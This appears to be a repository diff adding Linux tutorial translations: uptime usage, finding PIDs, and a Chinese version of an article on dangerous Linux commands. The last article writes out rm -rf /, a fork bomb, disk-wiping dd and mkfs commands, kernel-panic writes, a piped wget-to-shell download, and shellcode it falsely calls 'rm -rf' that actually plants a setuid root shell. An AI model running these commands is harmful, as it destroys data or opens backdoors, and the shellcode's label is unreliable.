Uptime's basic usage is very easy - just write the command's name and press enter.
|
||||
|
||||
uptime
|
||||
|
||||
Here's the kind of output the tool produces:
|
||||
|
||||
[![How to use the uptime command][1]][2]
|
||||
|
||||
So the first entry is the current time, then 'up' shows the system is running, 5:53 is the total time for which the system has been up, and then finally are the system load averages. Just in case you want to know more, here's what the uptime man page says about the last entry:
|
||||
```
|
||||
System load averages is the average number of processes that are either in a runnable or
|
||||
uninterruptable state. A process in a runnable state is either using the CPU or waiting to use the
|
||||
CPU. A process in uninterruptable state is waiting for some I/O access, eg waiting for disk.
|
||||
|
||||
The averages are taken over the three time intervals. Load averages are not normalized for the
|
||||
number of CPUs in a system, so a load average of 1 means a single CPU system is loaded all the
|
||||
time while on a 4 CPU system it means it was idle 75% of the time.
|
||||
```
|
||||
|
||||
### Q2. How to make the tool show up time in pretty format
|
||||
|
||||
In case you just want to know the time for which the system has been up, and that too in a more human-readable format, use the **-p** command line option.
|
||||
|
||||
```
|
||||
uptime -p
|
||||
```
|
||||
|
||||
Here's the output this command produced in our case:
|
||||
|
||||
[![make the tool show up time in pretty format][3]][4]
|
||||
|
||||
You can also make uptime specifically display the time/date since when the system has been running. This can be done using the **-s** command line option.
|
||||
|
||||
uptime -s
|
||||
|
||||
Here's the output the command produced in our case:
|
||||
|
||||
[![make uptime display date/time since when system is up][5]][6]
|
||||
|
||||
### Q4. How to get version information and help in general
|
||||
|
||||
Use the -V option to get version information, and -h for general help.
|
||||
|
||||
```
|
||||
uptime -V
|
||||
|
||||
uptime -h
|
||||
```
|
||||
|
||||
[![How to get version information and help][7]][8]
|
||||
|
||||
### Conclusion
|
||||
|
||||
As you'd have observed, the uptime command is easy to understand and use. It doesn't offer many features (or command line options). What all it offers have been discussed here. So just practice these options and you should be ready to use uptime in your day-to-day work. Just in case you require, here's the tool's [man page][9].
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.howtoforge.com/linux-uptime-command/
|
||||
|
||||
作者:[Himanshu Arora][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.howtoforge.com
|
||||
[1]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/uptime-basic-usage1.png
|
||||
[2]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/uptime-basic-usage1.png
|
||||
[3]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/uptime-p-option.png
|
||||
[4]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/uptime-p-option.png
|
||||
[5]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/uptime-s.png
|
||||
[6]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/uptime-s.png
|
||||
[7]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/uptime-v-h.png
|
||||
[8]:https://www.howtoforge.com/images/usage_of_pfsense_to_block_dos_attack_/big/uptime-v-h.png
|
||||
[9]:https://linux.die.net/man/1/uptime
|
@ -0,0 +1,105 @@
|
||||
Linux 中 4 个简单的找出进程 ID(PID)的方法
|
||||
======
|
||||
每个人都知道 PID,究竟什么是 PID?为什么你想要 PID?你打算用 PID 做什么?你脑子里有同样的问题吗?如果是这样,你就找对地方了解这些细节了。
|
||||
|
||||
主要地,我们查询 PID 来杀死一个没有响应的程序,它类似于 Windows 任务管理器。 Linux GUI 也提供相同的功能,但 CLI 是执行 kill 操作的有效方法。
|
||||
|
||||
### 什么是进程 ID?
|
||||
|
||||
PID 代表进程标识号(process identification),它在大多数操作系统内核(如 Linux、Unix、macOS 和 Windows)中使用。它是在操作系统中创建时自动分配给每个进程的唯一标识号。一个进程是一个正在运行的程序实例。
|
||||
|
||||
**建议阅读:** [如何查看 Apache Web 服务器在 Linux 中的运行时间][1]
|
||||
|
||||
除了 init 进程外其他所有的进程 ID 每次都会改变,因为 init 始终是系统上的第一个进程,并且是所有其他进程的父进程。它的 PID 是 1。
|
||||
|
||||
PID 默认的最大值是 `32,768`。可以在你的系统上运行 `cat /proc/sys/kernel/pid_max` 来验证。在 32 位系统上,32768 是最大值,但是我们可以在 64 位系统上将其设置为最大 2^22(约 4 百万)内的任何值。
|
||||
|
||||
你可能会问,为什么我们需要这么多的 PID?因为我们不能立即重用 PID,这就是为什么。另外为了防止可能的错误。
|
||||
|
||||
系统正在运行的进程的 PID 可以通过使用 pidof、pgrep、ps 和 pstree 命令找到。
|
||||
|
||||
### 方法 1:使用 pidof 命令
|
||||
|
||||
pidof 用于查找正在运行的程序的进程 ID。它在标准输出上打印这些 id。为了演示,我们将在 Debian 9(stretch)系统中找出 Apache2 的进程 ID。
|
||||
```
|
||||
# pidof apache2
|
||||
3754 2594 2365 2364 2363 2362 2361
|
||||
|
||||
```
|
||||
|
||||
从上面的输出中,你可能会遇到难以识别进程 ID 的问题,因为它通过进程名称显示了所有的 PID(包括父进程和子进程)。因此,我们需要找出父 PID(PPID),这是我们要查找的。它可能是第一个数字。在本例中,它是 `3754`,并按降序排列。
|
||||
|
||||
### 方法 2:使用 pgrep 命令
|
||||
|
||||
pgrep 遍历当前正在运行的进程,并将符合选择条件的进程 ID 列到标准输出中。
|
||||
```
|
||||
# pgrep apache2
|
||||
2361
|
||||
2362
|
||||
2363
|
||||
2364
|
||||
2365
|
||||
2594
|
||||
3754
|
||||
|
||||
```
|
||||
|
||||
这也与上面的输出类似,但是它将结果从小到大排序,这清楚地说明父 PID 是最后一个。在本例中,它是 `3754`。
|
||||
|
||||
**注意:** 如果你有多个进程的进程 ID,那么在使用 pidof 和 pgrep 识别父进程 ID 时可能会遇到麻烦。
|
||||
|
||||
### 方法 3:使用 pstree 命令
|
||||
|
||||
pstree 将运行的进程显示为一棵树。树的根是 pid,如果省略了 pid 那么就是 init。如果在 pstree 命令中指定了用户名,则显示相应用户拥有的所有进程。
|
||||
|
||||
pstree 通过将它们放在方括号中并添加重复计数前缀来可视化地合并相同的分支。
|
||||
```
|
||||
# pstree -p | grep "apache2"
|
||||
|- apache2(3754) -|-apache2(2361)
|
||||
| |-apache2(2362)
|
||||
| |-apache2(2363)
|
||||
| |-apache2(2364)
|
||||
| |-apache2(2365)
|
||||
| `-apache2(2594)
|
||||
|
||||
```
|
||||
|
||||
要单独获取父进程,请使用以下格式。
|
||||
```
|
||||
# pstree -p | grep "apache2" | head -1
|
||||
|- apache2(3754) -|-apache2(2361)
|
||||
|
||||
```
|
||||
|
||||
pstree 命令非常简单,因为它分别隔离了父进程和子进程,但这在使用 pidof 和 pgrep 时命令不容易。
|
||||
|
||||
### 方法 4:使用 ps 命令
|
||||
|
||||
ps 显示活动进程的选择信息。它显示进程 ID(pid=PID)、与进程关联的终端(tname=TTY)、以 [DD-]hh:mm:ss 格式(time=TIME)的累计 CPU 时间、以及执行名(ucmd = CMD)。输出默认是未排序的。
|
||||
```
|
||||
# ps aux | grep "apache2"
|
||||
www-data 2361 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2362 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2363 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2364 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2365 0.0 0.4 302652 8400 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2594 0.0 0.4 302652 8400 ? S 06:55 0:00 /usr/sbin/apache2 -k start
|
||||
root 3754 0.0 1.4 302580 29324 ? Ss Dec11 0:23 /usr/sbin/apache2 -k start
|
||||
root 5648 0.0 0.0 12784 940 pts/0 S+ 21:32 0:00 grep apache2
|
||||
|
||||
```
|
||||
|
||||
从上面的输出中,我们可以根据进程的启动日期轻松地识别父进程 ID(PPID)。在此例中,apache2 启动于 `Dec11`,它是父进程,其他的是子进程。apache2 的 PID 是 `3754`。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.2daygeek.com/how-to-check-find-the-process-id-pid-ppid-of-a-running-program-in-linux/
|
||||
|
||||
作者:[Magesh Maruthamuthu][a]
|
||||
译者:[geekpi](https://github.com/geekpi)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.2daygeek.com/author/magesh/
|
||||
[1]:https://www.2daygeek.com/check-find-apache-httpd-web-server-uptime-linux/
|
@ -0,0 +1,182 @@
|
||||
一些您不应该使用的 Linux 命令
|
||||
======
|
||||
当然,除非你想干掉你的机器。
|
||||
|
||||
蜘蛛侠有这样的一句信条, "权力越大,责任越大。" 对于 Linux 系统管理员们来说,这也是一种适合采用的明智态度。
|
||||
|
||||
不,真的,真心感谢 DevOps 的沟通协作和云编排技术,让一个 Linux 管理员不仅能掌控一台服务器,甚者能控制成千上万台服务器实例。只需要一个愚蠢的举动,你甚至可以毁掉一个价值数十亿美元的企业,比如 [not patching Apache Struts][1] 。
|
||||
|
||||
如果不能停留在安全补丁之上,将会带来一个远超过系统管理员工资等级的战略性业务问题。这里就有一些足以攻击 Linux 服务器的方式掌握在系统管理员手中。很容易想象到,只有新手才会犯这些错误,但是,我们需要了解的更多。
|
||||
|
||||
下列是一些著名的命令,任何拥有 root 权限的用户都能借助它们对服务器造成严重破坏。
|
||||
|
||||
警告:千万不要在生产环境运行这些命令,它们会危害你的系统。不要在家里尝试,也不要在办公室里测试。
|
||||
|
||||
那么,继续!
|
||||
|
||||
### rm -rf /
|
||||
|
||||
想要干脆利落的毁掉一个 Linux 系统吗?你无法超越这个被誉为“史上最糟糕”的经典,他能删除一切,我说的是,能删除所有存在你系统里的内容!
|
||||
|
||||
和大多数 [Linux commands][2]一样,‘rm’这个核心指令使用起来非常方便。即便是最顽固的文件他也能帮你删除。结合起后面两个参数理解‘rm’指令时,你很容易陷入沉思:‘-r’,强制递归删除所有子目录,‘-f’,无需确认,强制删除所有只读文件。如果你在根目录运行这条指令,将清除整个驱动器上的所有数据。
|
||||
|
||||
如果你真这么干了,想想该怎么和老板解释吧!
|
||||
|
||||
现在,也许你会想,“我永远不会犯这么愚蠢的错误。”朋友,骄兵必败。吸取一下经验教训吧 [this cautionary tale from a sysadmin on Reddit][3]:
|
||||
|
||||
> 我在IT界工作了很多年,但是今天,作为 Linux 系统 root 用户,我在错误的系统路径运行了‘rm- f’
|
||||
>
|
||||
> 长话短说,那天,我需要复制一大堆目录从一个目录到另一个目录,和你一样,我敲了几个‘cp -R’去复制我需要的内容。
|
||||
>
|
||||
> 在我的聪明才智下,我持续敲着上箭头,在命令记录中寻找可以复制使用的类似命令名,但是它们混杂在一大堆其他命令当中。
|
||||
>
|
||||
> 不管怎么说,我一边在 Skype、Slack 和 WhatsApp 的网页上打字,一边又和 Sage 通电话,注意力严重分散,我的脑子被‘rm -R ./videodir/* ../companyvideodirwith651vidsin/’这样一条命令自动驱使。
|
||||
|
||||
然后,当文件在一片空白后归档,公司的视频文件才出现。幸运的是,在疯狂敲击‘control -C’后,得以在删除大量文件之前,中止了这条命令。但这是对你的警告:任何人都可能犯这样的错误。
|
||||
|
||||
事实上,绝大部分现代操作系统都会在你烦这些错误之前,用一段醒目的文字警告你。然而,如果你在连续敲击键盘时忙碌或是分心,你将会把你的系统键入一个黑洞。
|
||||
|
||||
这里有一些更为隐蔽的方式调用 rm -rf。思考一下下面的代码
|
||||
|
||||
`char esp[] __attribute__ ((section(".text"))) = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"`
|
||||
|
||||
`"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"`
|
||||
|
||||
`"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"`
|
||||
|
||||
`"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"`
|
||||
|
||||
`"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"`
|
||||
|
||||
`"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"`
|
||||
|
||||
`"\x6e\x2f\x73\x68\x00\x2d\x63\x00"`
|
||||
|
||||
`"cp -p /bin/sh /tmp/.beyond; chmod 4755`
|
||||
|
||||
`/tmp/.beyond;";`
|
||||
|
||||
这是什么?这是 16 进制的‘rm -rf’写法。在你不明确这段代码之前,请不要运行这条命令。
|
||||
|
||||
### fork 炸弹
|
||||
|
||||
既然我们讨论的都是些奇怪的代码,不妨思考一下这一行:
|
||||
```
|
||||
:(){ :|: & };:
|
||||
```
|
||||
|
||||
对你来说,这可能看起来有些神秘,但是我看来,它很像那个臭名昭著的 [Bash fork bomb][4]。反复启动新的 Bash shell ,直到你的系统资源消耗殆尽直至系统崩溃。
|
||||
|
||||
不应该在最新的 Linux 系统上做这些操作。注意,我说的是不应该。我没有说不能。正确设置用户权限,Linux 系统能够阻止这些破坏性行为。通常用户仅限于分配使用机器可用内存。但是如果作为 root 用户的你运行了这行命令(或者它的变式 [Bash fork bomb variants][5]),你就需要反复敲击关机命令直到系统重启了。
|
||||
|
||||
### 垃圾数据重写硬盘
|
||||
|
||||
有时候你想彻底清除硬盘的数据,你应该使用 [Darik's Boot and Nuke (DBAN)][6] 工具去完成这项工作。
|
||||
|
||||
但是仅仅在你的存储器里制造最豪华的混乱,是很难彻底清除数据的:
|
||||
```
|
||||
Any command > /dev/hda
|
||||
```
|
||||
|
||||
在我说“any command,”时,意味着可以输出任意命令,比如:
|
||||
```
|
||||
ls -la > /dev/hda
|
||||
```
|
||||
|
||||
…引导目录列表到你的主存储设备。给我 root 权限和足够的时间,就能覆盖整个硬盘设备。相比于盲目恐慌,这才是这天工作的一个好的开始。或者,把它换成 [career-limiting crisis][7]。
|
||||
|
||||
### 擦除硬盘!
|
||||
|
||||
历来另一个受欢迎的擦除硬盘的方式是执行:
|
||||
```
|
||||
dd if=/dev/zero of=/dev/hda
|
||||
```
|
||||
|
||||
你可以用这条命令写入数据到你的硬盘设备。‘dd’命令可以从特殊文件中获取无尽个‘0’字符,并且将它全部写入你的设备。
|
||||
|
||||
可能现在 /dev/zero 目录觉得这是个愚蠢的想法,但是它真的管用。比如说,你可以使用 [clear unused space in a partition with zeros][8]。它能使分区里的图片压缩到更小以便于数据传输或是存档使用。
|
||||
|
||||
在另一方面,它和 `dd if=/dev/random of=/dev/hda` 近源,除了能毁掉你的一天之外,它并不友善。如果你运行了这个指令(千万不要),你的存储器会被随机数据覆盖。为了隐藏去接管办公室咖啡机的秘密计划,不错,这是一个粗糙的方法,但是你可以使用 DBAN 工具去更好得完成你的任务。
|
||||
|
||||
### /dev/null 的损失
|
||||
|
||||
也许因为数据珍贵,我们对备份的数据没有什么信心,确实很多“永远不要这样做!”的命令都会导致硬盘存储仓库数据被擦除。一个鲜明的实例:另一个毁灭你的存储设备的方式,运行‘mv / /dev/null’或者‘>mv ’。
|
||||
|
||||
在前一种情况下,你作为 root 用户,把整个磁盘数据都送进这个如饥似渴的目录 ‘/dev/null’。在后者,你仅仅把家目录喂给这个空空如也的目录,‘/dev/null’。任何一种情况下,除非备份还原,你再也不会再看见你的数据了。
|
||||
|
||||
451个研究报告指出,当提到容器的时候,都不要忽略数据持久和数据存储。
|
||||
|
||||
[Get the report][9]
|
||||
|
||||
见鬼,难道会计无论如何都真的不需要最新的应收账款文件吗?
|
||||
|
||||
### 格式化错了驱动器
|
||||
|
||||
有时候你必须使用这一条命令格式化驱动器:
|
||||
```
|
||||
mkfs.ext3 /dev/hda
|
||||
```
|
||||
|
||||
…它在格式化 ext3 文件系统的主硬盘驱动器。别,请等一分钟!你正在格式化你的主驱!难道你不需要用它?
|
||||
|
||||
当你要格式化驱动器的时候,请务必加倍确认你正在格式化的分区是真的需要格式化的那块还是你正在使用的那块,它们是是固态,闪存还是其他氧化铁。
|
||||
|
||||
### 内核崩溃
|
||||
|
||||
一些 Linux 命令不能让你的机器长时间计算。然而,一些命令却可以导致内核崩溃。这些错误通常是由硬件问题引起的,你可以自己解决。
|
||||
|
||||
当你遭遇内核崩溃,重新启动系统你才可以恢复工作。在一些情况下,这会有点小烦;在另一些情况下,这是一个大问题,比如说,高负荷运作下的生产环境。下面有一个案例:
|
||||
|
||||
```
|
||||
dd if=/dev/random of=/dev/port
|
||||
|
||||
echo 1 > /proc/sys/kernel/panic
|
||||
|
||||
cat /dev/port
|
||||
|
||||
cat /dev/zero > /dev/mem
|
||||
```
|
||||
这些都会导致内核崩溃。
|
||||
|
||||
不要运行你并不了解它功能的命令,它们都在提醒我…
|
||||
|
||||
### 提防未知脚本
|
||||
|
||||
年轻或是懒惰的系统管理员喜欢复制别人的脚本。何必重新重复造轮子?这样,它们找到了一个很酷的脚本,并且承诺会自动检查所有备份。它们匆匆得拿走了这样一个命令:
|
||||
```
|
||||
wget https://ImSureThisIsASafe/GreatScript.sh -O- | sh
|
||||
```
|
||||
这个下载脚本将输出到 shell 上运行。很明确,别大惊小怪,对吧?不对。这个脚本可能已经被这个恶意软件毒害。当然,一般来说 Linux 比大多数操作系统都要安全,但是如果你把位置代码运行在 root 用户上,什么可能会发生。这个危害不仅在恶意软件上,脚本作者的愚蠢本身同样有害。你甚至可能会因为一个未调试的代码吃上一堑--由于你没有花时间去读它。
|
||||
|
||||
你认为你不会干那样的事?告诉我,所有会有这些事情发生 [container images you're running on Docker][10]?你直到它们到底在运行着什么吗?我见过太多都未验证容器里面装着什么就运行它们的系统管理员。请不要和他们一样。
|
||||
|
||||
### 结束
|
||||
|
||||
这些故事背后的道理很简单。在你的 Linux 系统里,你有巨大的控制权。你几乎可以让你的服务器做任何事。在你使用你的权限的同时,请务必做认真的确认。如果你没有,你毁灭的不是你的服务器,而是你的工作甚至是你的公司。像蜘蛛侠一样负责任的使用你的权限。
|
||||
|
||||
我有没有遗漏什么?在 [@sjvn][11] 或 [@enterprisenxt][12] 上告诉我那些 Linux命令在你的“[Never use this!][13]”的清单上。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.hpe.com/us/en/insights/articles/the-linux-commands-you-should-never-use-1712.html
|
||||
|
||||
作者:[Steven Vaughan-Nichols][a]
|
||||
译者:[译者ID](https://github.com/CYLeft)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.hpe.com/us/en/insights/contributors/steven-j-vaughan-nichols.html
|
||||
[1]:http://www.zdnet.com/article/equifax-blames-open-source-software-for-its-record-breaking-security-breach/
|
||||
[2]:https://www.hpe.com/us/en/insights/articles/16-linux-server-monitoring-commands-you-really-need-to-know-1703.html
|
||||
[3]:https://www.reddit.com/r/sysadmin/comments/732skq/after_21_years_i_finally_made_the_rm_boo_boo/
|
||||
[4]:https://www.cyberciti.biz/faq/understanding-bash-fork-bomb/
|
||||
[5]:https://unix.stackexchange.com/questions/283496/why-do-these-bash-fork-bombs-work-differently-and-what-is-the-significance-of
|
||||
[6]:https://dban.org/
|
||||
[7]:https://www.hpe.com/us/en/insights/articles/13-ways-to-tank-your-it-career-1707.html
|
||||
[8]:https://unix.stackexchange.com/questions/44234/clear-unused-space-with-zeros-ext3-ext4
|
||||
[9]:https://www.hpe.com/us/en/resources/solutions/enterprise-devops-containers.html?jumpid=in_insights~510287587~451_containers~badLinux
|
||||
[10]:https://www.oreilly.com/ideas/five-security-concerns-when-using-docker
|
||||
[11]:http://www.twitter.com/sjvn
|
||||
[12]:http://www.twitter.com/enterprisenxt
|
||||
[13]:https://www.youtube.com/watch?v=v79fYnuVzdI
|
Loading…
Reference in New Issue
Block a user